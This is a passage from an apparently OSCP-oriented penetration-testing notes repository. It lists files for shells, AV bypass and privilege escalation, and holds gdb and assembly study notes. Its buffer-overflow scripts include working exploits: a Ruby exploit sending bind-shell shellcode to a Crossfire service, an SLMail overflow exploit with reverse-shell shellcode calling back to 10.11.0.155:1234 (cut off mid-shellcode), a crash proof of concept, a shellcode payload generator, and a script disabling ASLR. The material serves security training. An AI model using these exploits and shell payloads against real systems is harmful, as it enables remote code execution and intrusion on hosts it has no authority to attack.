├── .gitignore ├── LICENSE ├── README.md ├── bookmarks.md ├── buffer_overflow ├── assembly │ ├── 64_ia_32_jmp_instructions.pdf │ ├── IntelCodeTable_x86.pdf │ ├── Radare2 cheat sheet.txt │ ├── course_notes.md │ ├── debuging.md │ ├── images │ │ ├── 0x80_interupt_system_calls.png │ │ ├── IntelRegisters.gif │ │ ├── cpu_modes.png │ │ ├── general_purpose_registers.png │ │ ├── linux_models.png │ │ ├── memory_arch.png │ │ ├── memory_maps.png │ │ ├── memory_models.png │ │ └── write_system_call.png │ ├── x86_assembly_x86_architecture.pdf │ └── x86_opcode_structure_and_instruction_overview.png ├── buffer_overflows.md ├── gdb_cheat_sheet.pdf ├── r2_cheatsheet.pdf ├── scripts │ ├── bad_chars.txt │ ├── disable_linux_security.sh │ ├── linux_bo_exploit.rb │ ├── linux_bo_poc.py │ ├── payload.py │ ├── windows_bo_exploit.rb │ └── windows_bo_fuzzer.py └── win32_buffer_overflow_exploitation.md ├── cheatSheets ├── Cheatsheet_AIXBuild.txt ├── Cheatsheet_AVBypass.txt ├── Cheatsheet_ApacheSSL.txt ├── Cheatsheet_AttackingMSSQL.txt ├── Cheatsheet_BashScripting.txt ├── Cheatsheet_BuildReviews.txt ├── Cheatsheet_CTF.txt ├── Cheatsheet_CiscoIOS.txt ├── Cheatsheet_CookieStealing.txt ├── Cheatsheet_DomainAdminExploitation.txt ├── Cheatsheet_ExploitDev.txt ├── Cheatsheet_GDB.txt ├── Cheatsheet_GPG.txt ├── Cheatsheet_HTTPBasicAuth.txt ├── Cheatsheet_IKEScan.txt ├── Cheatsheet_LinuxPrivilegeEsc.txt ├── Cheatsheet_LocalSamDump.txt ├── Cheatsheet_MSFPostExploitation.txt ├── Cheatsheet_Metasploit.pdf ├── Cheatsheet_MetasploitPayloads.txt ├── Cheatsheet_MobileAppTesting.txt ├── Cheatsheet_Networking.txt ├── Cheatsheet_OWASPCheckList.txt ├── Cheatsheet_Oracle.txt ├── Cheatsheet_PenTesting.txt ├── Cheatsheet_Pyinstaller.txt ├── Cheatsheet_Python.pdf ├── Cheatsheet_Remediations.txt ├── Cheatsheet_SMBCapture.txt ├── Cheatsheet_SMBEnumeration.txt ├── Cheatsheet_SMTPOpenRelay.txt ├── Cheatsheet_SQLInjection.txt ├── Cheatsheet_SSLStrip.txt ├── Cheatsheet_Solaris.txt ├── Cheatsheet_Tools.txt ├── 
Cheatsheet_UsefulCommands.txt ├── Cheatsheet_VOIP.txt ├── Cheatsheet_Vlans.txt ├── Cheatsheet_VulnVerify.txt ├── Cheatsheet_WindowsCommandLine.pdf ├── Cheatsheet_WirelessTesting.txt ├── Cheatsheet_scp.txt ├── beginners_python_cheat_sheet.pdf ├── complexity_cheatsheet.pdf ├── egghead-react-cheat-sheet-0-14-7.pdf ├── egghead-redux-cheat-sheet-3-2-1.pdf ├── emmet_cheat_sheet.pdf ├── es6_cheat_sheet.txt ├── html5_cheat_sheet.pdf ├── jquery_cheat_sheet_1.3.2.pdf ├── reverse_shell_with_msfvenom.txt ├── sass.png ├── sass_functions.pdf └── sass_functions.txt ├── client_side └── signed_applet.java ├── crypto └── Crypto101.pdf ├── enumeration ├── active_information_gathering.md ├── configuration_management.md ├── dns_enumeration.md ├── file_enumeration.md ├── http_enumeration.md ├── information_gathering_owasp_guide.md ├── miniserv_webmin_enumeration.md ├── ms_sql_server_enumeration.md ├── nfs_enumeration.md ├── osint_recon_ng.md ├── passive_information_gathering.md ├── pop3_enumeration.md ├── rpc_enumeration.md ├── scanning.md ├── smb_enumeration.md ├── smtp_enumeration.md ├── snmb_enumeration.md ├── tools │ ├── host_list.sh │ ├── linenumv2.sh │ ├── mass.sh │ ├── recon_scan │ │ ├── dirbust.py │ │ ├── dnsrecon.py │ │ ├── finger-user-enum.pl │ │ ├── ftprecon.py │ │ ├── readme.txt │ │ ├── reconscan.py │ │ ├── samrdump.py │ │ ├── smbrecon.py │ │ ├── smtp-user-enum.pl │ │ ├── smtprecon.py │ │ ├── snmprecon.py │ │ └── sshrecon.py │ ├── reconscan.py │ └── remoterecon.py ├── vulnerability_scanning.md └── windows_enumeration.md ├── exploitation ├── 643-fixed ├── File_Transfers.md ├── Post-Exploitation.md ├── Public Exploits.md ├── computer_network_exploits.md ├── downloadproxy.ps1 ├── ftp-txt ├── jsp_processbuilder_shell.java ├── jspb64_shell.java ├── minimum_csharp_shell.java ├── nc_transfers.txt ├── openfuck.c ├── powershell_to_meterpreter.sh ├── reverse.ps1 ├── reverse_shell.py ├── reverse_shell_with_msfvenom.md ├── setuid.c ├── trans2open.c ├── useradd.c ├── wget-ps1 ├── 
wget-vbs └── wget.vbs ├── images ├── 33.png ├── 34.png ├── 35.png ├── 36.png ├── 37.png ├── 38.png ├── 39.png ├── 40.png ├── 41.png ├── 42.png ├── 43.png ├── 44.png ├── FDDI_Dual_Token_Ring.jpg ├── ICMP-Header.png ├── IP-Header-v6.png ├── IP-Header.png ├── TCP-Header.png ├── Token_ring.svg ├── UDP-Header.png ├── active_passive_ftp.png ├── arp.png ├── broadcast_addresses.png ├── cable_categories.png ├── cable_categories_2.png ├── cidr.png ├── common_ports.jpg ├── dns.png ├── dns_hierarchy.png ├── dns_security.png ├── encapsulation_decapcultations.png ├── fddi_basic2.gif ├── ftp.png ├── how_protocal_stacks_communicate.png ├── how_tcp_packets_are_created.png ├── icmp_header_2.png ├── inside_stack.png ├── ip6_addressing.png ├── ip6_features.png ├── ip6_vs_ip4.png ├── ip_osi.png ├── ip_v6_addressing.png ├── ipv6-ipv4-vs-ipv6-header.png ├── mac_ip_1.png ├── mac_ip_2.png ├── network_design.png ├── network_device.png ├── new_breed_of_swithces.png ├── osi_model.jpg ├── osi_tcp_models.png ├── osi_vs_tcp_ip.png ├── ping.png ├── ports_protocols.png ├── private_addresses.png ├── private_adresses.png ├── routing.png ├── subnet_classes.png ├── tcp.png ├── tcp_close_connection.png ├── tcp_connection.png ├── tcp_header_2.png ├── tcp_uses.png ├── tcp_vs_udp.png ├── traceroute.png ├── udp.png ├── udp_header_2.png ├── upd_uses.png └── vlan_nac.png ├── md_tree.sh ├── networking ├── bpf_syntax.md ├── networking_concept.md ├── nmap_quick_reference_guide.pdf └── tcpdump.pdf ├── os ├── kali_linux_commands.md ├── lunux_windows_commands.md ├── preparing_kali.md ├── preparing_windows.md └── useful_commands.md ├── oscp_resources ├── OSCP-Survival-Guide.md ├── jolly_frog.html └── oscp_course_layout.md ├── password_attack └── common_password_topologies.txt ├── port_forwarding └── nc_relays.txt ├── priv_escalation ├── Privilege_Escalation.md ├── Privledge_Logic_Transport.md ├── escalation_gathering.sh ├── windows_priv_escalation.md └── windows_priv_escalation_practical.md ├── scripts ├── 
cred_check.py ├── hash_check.py ├── sqldeli.py ├── string_decode.py └── xploit_installer.py ├── social_engineering ├── social_engineering.md └── tools │ └── scythe │ ├── README.md │ ├── accountfile.txt │ ├── documentation │ └── module_overview.md │ ├── license │ ├── logfile.txt │ ├── modules │ ├── blogs │ │ ├── blogspot_user.xml │ │ ├── delicious_user.xml │ │ ├── goodreads_user.xml │ │ ├── livejournal_user.xml │ │ ├── mahalo_user.xml │ │ ├── newsvine_user.xml │ │ ├── posterous_user.xml │ │ ├── resumebucket_user.xml │ │ ├── squidoo_user.xml │ │ ├── tumblr.com_email.xml │ │ ├── tumblr.com_username.xml │ │ └── wordpress.com.xml │ ├── commerce │ │ ├── ebay.com_user.xml │ │ ├── etsy_user.xml │ │ └── kaboodle_user.xml │ ├── development │ │ ├── github.com_email.xml │ │ └── github.com_user.xml │ ├── examples.xml │ ├── forums │ │ ├── backtrack_forum_username.xml │ │ ├── buzznet_user.xml │ │ ├── cafemom_user.xml │ │ ├── colourlovers_user.xml │ │ ├── deviantart_user.xml │ │ ├── epinions_user.xml │ │ ├── families_user.xml │ │ ├── fanpop_user.xml │ │ ├── instructables_user.xml │ │ └── wikipedia_user.xml │ ├── games │ │ ├── kongregate_user.xml │ │ └── xfire_user.xml │ ├── media │ │ ├── dailymotion_user.xml │ │ ├── flickr_user.xml │ │ ├── funnyordie_user.xml │ │ ├── hulu_user.xml │ │ ├── justintv_user.xml │ │ ├── lastfm_user.xml │ │ ├── photobucket_user.xml │ │ ├── soundcloud_user.xml │ │ ├── twitpic_user.xml │ │ ├── ustream_user.xml │ │ ├── vimeo_user.xml │ │ ├── yfrog_user.xml │ │ ├── youtube_user.xml │ │ └── zooomr_user.xml │ ├── social │ │ ├── badoo_user.xml │ │ ├── bitly_user.xml │ │ ├── cardcloud_user.xml │ │ ├── disqus_user.xml │ │ ├── facebook_email_phone.com.xml │ │ ├── flixster_user.xml │ │ ├── foursquare_user.xml │ │ ├── gather_user.xml │ │ ├── linkedin_user.xml │ │ ├── myspace_user.xml │ │ ├── reddit.com_username.xml │ │ ├── slideshare_user.xml │ │ ├── stumbleupon_user.xml │ │ ├── twitter.com_email_phone.xml │ │ ├── twitter.com_username.xml │ │ ├── wefollow_user.xml │ 
│ └── xing.com.xml │ └── webmail │ │ ├── gmail_user.xml │ │ ├── hushmail.xml │ │ └── yahoo_email.xml │ ├── scythe.ico │ ├── scythe.py │ ├── scythe_0.2.8.exe │ └── test.log ├── templates ├── PWKv1-REPORT.doc ├── linux-template.md ├── pwkv1_report.doc └── windows-template.md ├── useful_tricks.md ├── web_pentest ├── auxiliary_info.md ├── file_upload.md ├── scripts │ ├── dir_run_gobuster.sh │ ├── lfi_infile.py │ ├── sqli_timebased.py │ ├── xss_bmp_header.py │ └── xss_gif_header.py ├── sqli.md ├── sqli_cheatsheet.md ├── web_app_security.md ├── xss.json ├── xss.md ├── xss.png └── xss_actionscript └── wifi └── wifi_penetration_testing.md /.gitignore: -------------------------------------------------------------------------------- 1 | .vscode/* 2 | !.vscode/settings.json 3 | !.vscode/tasks.json 4 | !.vscode/launch.json 5 | !.vscode/extensions.json 6 | 7 | # General 8 | .DS_Store 9 | .AppleDouble 10 | .LSOverride 11 | 12 | # Icon must end with two \r 13 | Icon 14 | 15 | # Thumbnails 16 | ._* 17 | 18 | # Files that might appear in the root of a volume 19 | .DocumentRevisions-V100 20 | .fseventsd 21 | .Spotlight-V100 22 | .TemporaryItems 23 | .Trashes 24 | .VolumeIcon.icns 25 | .com.apple.timemachine.donotpresent 26 | 27 | # Directories potentially created on remote AFP share 28 | .AppleDB 29 | .AppleDesktop 30 | Network Trash Folder 31 | Temporary Items 32 | .apdisk 33 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2017 Anas Aboureada 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom 
the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /buffer_overflow/assembly/64_ia_32_jmp_instructions.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/buffer_overflow/assembly/64_ia_32_jmp_instructions.pdf -------------------------------------------------------------------------------- /buffer_overflow/assembly/IntelCodeTable_x86.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/buffer_overflow/assembly/IntelCodeTable_x86.pdf -------------------------------------------------------------------------------- /buffer_overflow/assembly/course_notes.md: -------------------------------------------------------------------------------- 1 | # x86 Assembly Language and Shellcoding on Linux - Pentester Academy (study notes) 2 | 3 | ## Know your cpu 4 | 5 | ```Shell 6 | >> lscpu 7 | >> cat /proc/cpuifo 8 | ``` 9 | 10 | ## General Purpose registers 11 | 12 | ![](./images/IntelRegisters.gif) 13 | 14 | ## Investegating CPU registers 15 | 16 | ```Shell 17 | # First attach 
gdp to a running process 18 | >> gdp /bin/bash 19 | 20 | # set a break point 21 | >> (gdb) break main 22 | 23 | # See all CPU registers 24 | >> (gdb) info registers 25 | 26 | # See EAX in hex (General purpose flag) 27 | >> (gdb) display /x $ax 28 | >> (gdb) display /x $eax 29 | >> (gdb) display /x $ax 30 | >> (gdb) display /x $ah 31 | ``` 32 | 33 | ## Checking which command will run next 34 | 35 | ```Shell 36 | >> (gdb) disassemble $eip 37 | ``` 38 | 39 | ## To see all registers 40 | 41 | ```Shell 42 | >> (gdb) info all-registers 43 | ``` 44 | 45 | ## Change gdb to show Intel syntax instead of AT&T 46 | 47 | ```Shell 48 | >> (gdb) set disassembly-flavor intel 49 | ``` 50 | 51 | ## CPU Modes 52 | 53 | ![](./images/cpu_modes.png) 54 | 55 | ## Memory Models 56 | 57 | ![](./images/memory_models.png) 58 | 59 | ## Linux Mode and memory model 60 | 61 | ![](./images/linux_models.png) 62 | 63 | ## Memory arch 64 | 65 | ![](./images/memory_arch.png) 66 | 67 | ## Investigating memory of a running process 68 | 69 | ![](./images/memory_maps.png) 70 | 71 | ```Shell 72 | # Get proccess pid 73 | >> ps | grep 74 | >> cat /proc//maps 75 | ``` 76 | 77 | OR 78 | 79 | ```Shell 80 | >> pmap -d 81 | ``` 82 | 83 | OR Attach the process to GDB 84 | 85 | ```Shell 86 | >> (gdb) info proc mappings 87 | ``` 88 | 89 | ## Get all system code numbers 90 | 91 | ```Shell 92 | >> vim /usr/include/i386-linux-gnu/asm/unistd_32.h 93 | ``` 94 | 95 | ## Invoking system calls with interupt 0x80 96 | 97 | ![](./images/0x80_interupt_system_calls.png) 98 | ![](./images/write_system_call.png) 99 | 100 | ## To see the manual for a system function 101 | 102 | ```Shell 103 | >> man 2 104 | # e.g. 
105 | >> man 2 write 106 | ``` 107 | 108 | ## Creating our first assembly app 109 | 110 | [hello_world.asm](./source/hello_world.asm) 111 | 112 | ```Shell 113 | # building 114 | >> nasm -f elf32 hello_world.asm -o hello_world.o 115 | 116 | # linking 117 | >> ld hello_world.o -o HelloWorld 118 | 119 | # running 120 | >> ./HelloWorld 121 | 122 | # Debugging 123 | >> gdb ./HelloWorld 124 | >> (gdb) break _start 125 | >> (gdb) run 126 | >> (gdb) set disassembly-flavor intel 127 | >> (gdb) disassemble 128 | >> (gdb) info registers 129 | >> (gdb) stepibb 130 | ``` 131 | -------------------------------------------------------------------------------- /buffer_overflow/assembly/debuging.md: -------------------------------------------------------------------------------- 1 | # Debuging using GDB 2 | 3 | ## Compiling C code with GDB debug symbols 4 | 5 | ```Shell 6 | >> gcc -ggdb -o 7 | ``` 8 | -------------------------------------------------------------------------------- /buffer_overflow/assembly/images/0x80_interupt_system_calls.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/buffer_overflow/assembly/images/0x80_interupt_system_calls.png -------------------------------------------------------------------------------- /buffer_overflow/assembly/images/IntelRegisters.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/buffer_overflow/assembly/images/IntelRegisters.gif -------------------------------------------------------------------------------- /buffer_overflow/assembly/images/cpu_modes.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/buffer_overflow/assembly/images/cpu_modes.png -------------------------------------------------------------------------------- /buffer_overflow/assembly/images/general_purpose_registers.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/buffer_overflow/assembly/images/general_purpose_registers.png -------------------------------------------------------------------------------- /buffer_overflow/assembly/images/linux_models.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/buffer_overflow/assembly/images/linux_models.png -------------------------------------------------------------------------------- /buffer_overflow/assembly/images/memory_arch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/buffer_overflow/assembly/images/memory_arch.png -------------------------------------------------------------------------------- /buffer_overflow/assembly/images/memory_maps.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/buffer_overflow/assembly/images/memory_maps.png -------------------------------------------------------------------------------- /buffer_overflow/assembly/images/memory_models.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/buffer_overflow/assembly/images/memory_models.png 
-------------------------------------------------------------------------------- /buffer_overflow/assembly/images/write_system_call.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/buffer_overflow/assembly/images/write_system_call.png -------------------------------------------------------------------------------- /buffer_overflow/assembly/x86_assembly_x86_architecture.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/buffer_overflow/assembly/x86_assembly_x86_architecture.pdf -------------------------------------------------------------------------------- /buffer_overflow/assembly/x86_opcode_structure_and_instruction_overview.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/buffer_overflow/assembly/x86_opcode_structure_and_instruction_overview.png -------------------------------------------------------------------------------- /buffer_overflow/gdb_cheat_sheet.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/buffer_overflow/gdb_cheat_sheet.pdf -------------------------------------------------------------------------------- /buffer_overflow/r2_cheatsheet.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/buffer_overflow/r2_cheatsheet.pdf -------------------------------------------------------------------------------- /buffer_overflow/scripts/bad_chars.txt: 
-------------------------------------------------------------------------------- 1 | badchars = "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b" + 2 | "\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a" + 3 | "\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59" + 4 | "\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78" + 5 | "\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97" + 6 | "\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6" + 7 | "\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5" + 8 | "\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4" + 9 | "\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" 10 | -------------------------------------------------------------------------------- /buffer_overflow/scripts/disable_linux_security.sh: -------------------------------------------------------------------------------- 1 | cat /proc/sys/kernel/randomize_va_space 2 | sudo bash -c 'echo "kernel.randomize_va_space = 0" >> /etc/sysctl.conf' 3 | sudo sysctl -p 4 | cat /proc/sys/kernel/randomize_va_space 5 | # verify "0" 6 | ulimit -c unlimited 7 | ulimit -c 8 | -------------------------------------------------------------------------------- /buffer_overflow/scripts/linux_bo_exploit.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | =begin 4 | This exploit takes advantage of a buffer overflow vulnerability during the 5 | sound setup 
stage of the game Crossfire. 6 | =end 7 | 8 | require 'socket' 9 | 10 | #total size = 4379 11 | #offset = 4368 12 | #bad chars = "\x00\x0a\x0d\x20" 13 | 14 | #add eax, 12 = 83C00C 15 | #jmp eax = FFE0 16 | 17 | 18 | #create shellcode 19 | #creates a bind shell on port 4444 20 | shellcode = "\xba\xe9\x41\x08\x31\xdb\xd3\xd9\x74\x24\xf4\x58\x29\xc9\xb1"+ 21 | "\x14\x31\x50\x14\x83\xc0\x04\x03\x50\x10\x0b\xb4\x39\xea\x3c"+ 22 | "\xd4\x69\x4f\x91\x71\x8c\xc6\xf4\x36\xf6\x15\x76\x6d\xa9\xf7"+ 23 | "\x1e\x90\x55\xe9\x82\xfe\x45\x58\x6a\x76\x84\x30\xec\xd0\x8a"+ 24 | "\x45\x79\xa1\x10\xf5\x7d\x92\x7f\x34\xfd\x91\xcf\xa0\x30\x95"+ 25 | "\xa3\x74\xa0\xa9\x9b\x4b\xb4\x9f\x62\xac\xdc\x30\xba\x3f\x74"+ 26 | "\x27\xeb\xdd\xed\xd9\x7a\xc2\xbd\x76\xf4\xe4\x8d\x72\xcb\x67" 27 | 28 | #create buffer to cause the crash 29 | buffer = "\x90" * (4368 - 105) 30 | 31 | 32 | #create eip value 33 | eip = "\x97\x45\x13\x08" 34 | 35 | #create stage one 36 | stage_one = "\x83\xC0\x0C\xFF\xE0" 37 | 38 | #create padding 39 | padding = "\x90" * (4379 - 4368 - 4 - 5) 40 | 41 | #assemble payload 42 | payload = "\x11(setup sound " + shellcode + buffer + eip + stage_one + padding + "\x90\x00\#" 43 | 44 | #send payload 45 | puts "sending payload..." 46 | socket = Socket.tcp("127.0.0.1", 13327) 47 | socket.write(payload) 48 | puts socket.gets.chomp 49 | socket.close 50 | puts "payload sent... socket closed..." 51 | exit(0) 52 | -------------------------------------------------------------------------------- /buffer_overflow/scripts/linux_bo_poc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | host = "127.0.0.1" 5 | 6 | crash = "\x41" * 4379 7 | 8 | buffer = "\x11(setup sound " + crash + "\x90\x00#" 9 | 10 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 11 | print "[*]Sending evil buffer..." 
12 | s.connect((host, 13327)) 13 | s.send(buffer) 14 | data=s.recv(1024) 15 | print data 16 | s.close() 17 | print "[*]Payload sent !" 18 | -------------------------------------------------------------------------------- /buffer_overflow/scripts/payload.py: -------------------------------------------------------------------------------- 1 | prefix = "\\x41" * 80 2 | eip = "\\x42" * 4 3 | nop = "\\x90" * (400 - 137) 4 | buf = "" 5 | buf += "\\xba\\x8a\\x2a\\xb0\\xa4\\xd9\\xed\\xd9\\x74\\x24\\xf4\\x5d\\x31" 6 | buf += "\\xc9\\xb1\\x1c\\x31\\x55\\x14\\x03\\x55\\x14\\x83\\xed\\xfc\\x68" 7 | buf += "\\xdf\\xda\\xd9\\x34\\xb9\\xa9\\x25\\x7d\\xb9\\xdd\\x29\\x7d\\x33" 8 | buf += "\\x3e\\x4f\\xfc\\xa0\\xc1\\x60\\x33\\xa6\\xf3\\x5b\\x3c\\x44\\xa0" 9 | buf += "\\x18\\x91\\xe1\\x45\\x16\\xf4\\x46\\x2f\\xe5\\x76\\xf7\\xda\\xf1" 10 | buf += "\\x22\\x92\\x18\\x90\\xcb\\x32\\x8a\\xed\\x2a\\xd8\\xba\\xb6\\xc6" 11 | buf += "\\x7b\\x9b\\x85\\x96\\x13\\x98\\xd2\\x82\\x42\\xc4\\x84\\xf8\\x1c" 12 | buf += "\\xf8\\x38\\xed\\x80\\x96\\x28\\x5c\\x69\\xee\\xa8\\x34\\xef\\xa8" 13 | buf += "\\xe7\\x48\\x3e\\xab\\x48\\x2e\\x0c\\xac\\xf9\\xed\\x3e\\xcb\\x70" 14 | buf += "\\xa0\\x3a\\xd9\\x03\\xd1\\xf5\\xed\\xb3\\xd6\\x34\\x6d\\x34\\x07" 15 | buf += "\\x9d\\xde\\x3d\\x7a\\xa2\\xe0\\xa3" 16 | 17 | payload = prefix + eip + nop + buf 18 | print(payload) 19 | 20 | with open('payload.txt', 'w') as f: 21 | hex_content = f.write(payload) 22 | -------------------------------------------------------------------------------- /buffer_overflow/scripts/windows_bo_exploit.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | =begin 4 | takes advantage of the LONG_PASS buffer overflow vulnerability in SLMAIL. 
5 | uses windows/shell_reverse_tcp payload 6 | connects to 10.11.0.155:1234 7 | encoded with 1 pass of x86/shitaka_ga_nai 8 | =end 9 | 10 | require 'socket' 11 | 12 | #bad chars = "\x00\x0a\x0d" 13 | #jmp esp address = 5F4A358F 14 | 15 | #create padding to crash the program 16 | buffer = "A" * 2606 17 | 18 | #create eip register value 19 | eip = "\x8f\x35\x4a\x5f" 20 | 21 | #create encoder buffer 22 | encoder_buffer = "\x90" * 16 23 | 24 | #create shellcode 25 | shellcode = "\xba\xd1\x38\xf2\x36\xda\xc6\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"+ 26 | "\x52\x31\x56\x12\x83\xee\xfc\x03\x87\x36\x10\xc3\xdb\xaf\x56"+ 27 | "\x2c\x23\x30\x37\xa4\xc6\x01\x77\xd2\x83\x32\x47\x90\xc1\xbe"+ 28 | "\x2c\xf4\xf1\x35\x40\xd1\xf6\xfe\xef\x07\x39\xfe\x5c\x7b\x58"+ 29 | "\x7c\x9f\xa8\xba\xbd\x50\xbd\xbb\xfa\x8d\x4c\xe9\x53\xd9\xe3"+ 30 | "\x1d\xd7\x97\x3f\x96\xab\x36\x38\x4b\x7b\x38\x69\xda\xf7\x63"+ 31 | "\xa9\xdd\xd4\x1f\xe0\xc5\x39\x25\xba\x7e\x89\xd1\x3d\x56\xc3"+ 32 | "\x1a\x91\x97\xeb\xe8\xeb\xd0\xcc\x12\x9e\x28\x2f\xae\x99\xef"+ 33 | "\x4d\x74\x2f\xeb\xf6\xff\x97\xd7\x07\xd3\x4e\x9c\x04\x98\x05"+ 34 | "\xfa\x08\x1f\xc9\x71\x34\x94\xec\x55\xbc\xee\xca\x71\xe4\xb5"+ 35 | "\x73\x20\x40\x1b\x8b\x32\x2b\xc4\x29\x39\xc6\x11\x40\x60\x8f"+ 36 | "\xd6\x69\x9a\x4f\x71\xf9\xe9\x7d\xde\x51\x65\xce\x97\x7f\x72"+ 37 | "\x31\x82\x38\xec\xcc\x2d\x39\x25\x0b\x79\x69\x5d\xba\x02\xe2"+ 38 | "\x9d\x43\xd7\xa5\xcd\xeb\x88\x05\xbd\x4b\x79\xee\xd7\x43\xa6"+ 39 | "\x0e\xd8\x89\xcf\xa5\x23\x5a\xfa\x32\x2b\x01\x92\x46\x2b\x31"+ 40 | "\xb1\xce\xcd\x53\x25\x87\x46\xcc\xdc\x82\x1c\x6d\x20\x19\x59"+ 41 | "\xad\xaa\xae\x9e\x60\x5b\xda\x8c\x15\xab\x91\xee\xb0\xb4\x0f"+ 42 | "\x86\x5f\x26\xd4\x56\x29\x5b\x43\x01\x7e\xad\x9a\xc7\x92\x94"+ 43 | "\x34\xf5\x6e\x40\x7e\xbd\xb4\xb1\x81\x3c\x38\x8d\xa5\x2e\x84"+ 44 | "\x0e\xe2\x1a\x58\x59\xbc\xf4\x1e\x33\x0e\xae\xc8\xe8\xd8\x26"+ 45 | "\x8c\xc2\xda\x30\x91\x0e\xad\xdc\x20\xe7\xe8\xe3\x8d\x6f\xfd"+ 46 | "\x9c\xf3\x0f\x02\x77\xb0\x30\xe1\x5d\xcd\xd8\xbc\x34\x6c\x85"+ 47 | 
